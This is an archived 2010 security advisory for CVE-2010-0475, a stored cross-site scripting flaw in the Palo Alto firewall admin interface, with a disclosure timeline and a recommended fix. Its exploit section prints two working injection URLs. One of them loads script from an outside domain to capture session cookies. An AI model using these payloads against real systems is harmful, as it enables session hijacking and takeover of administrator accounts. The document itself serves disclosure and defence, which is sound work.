Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

2010-05-13T00:00:00
ID SECURITYVULNS:DOC:23849
Type securityvulns
Reporter Securityvulns
Modified 2010-05-13T00:00:00

Description

Class: Cross-Site Scripting (XSS) Vulnerability CVE: CVE-2010-0475 Remote: Yes Local: Yes Published: May 11, 2010 08:30AM Timeline:Submission to MITRE: 1/18/2010 Vendor Contact: 2/18/2010 Vendor Response: 2/18/2010 Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9) Credit: Jeromie Jackson CISSP, CISM COBIT & ITIL Certified President- San Diego Open Web Application Security Project (OWASP) Vice President- San Diego Information Audit & Control Association (ISACA) SANS Mentor LinkedIn: www.linkedin.com/in/securityassessment Blog: www.JeromieJackson.com Twitter: www.twitter.com/Security_Sifu

Validated Vulnerable:
Latest Version Per December 31, 2009

Discussion:

A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo Alto interface. By crafting a URL that includes XSS code it is possible to inject malicious data, redirect the user to a bogus replica of the real website, or other nefarious activity.

Exploit: Single Line working- https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=*&cpasswd=*&role=vsysadmin<SCRIPT>alert("0wn3d")</SCRIPT>

&admin-role=%5Bobject+Object%5D&bSubmit=O

WORKING FOR REDIRECT TO LOAD cookies into URL.

https://10.32.5.223:443/esp/editUser.esp?mode=edit&origusername=test&deviceC=localhost.localdomain&vsysC=localhost.localdomain%2Fvsys1&vsys=&profile=&cfgchange=&opasswd=&tpasswd=*&cpasswd=*&role=vsysadmin<SCRIPT/XSS SRC="http://www.jeromiejackson.com/tryme.js"></SCRIPT>&admin-role=%5Bobject+Object%5D&bSubmit=O

Solution: A patch will be required from the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.

References: OWASP Cross-Site Scripting (XSS) Attack Discussion Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet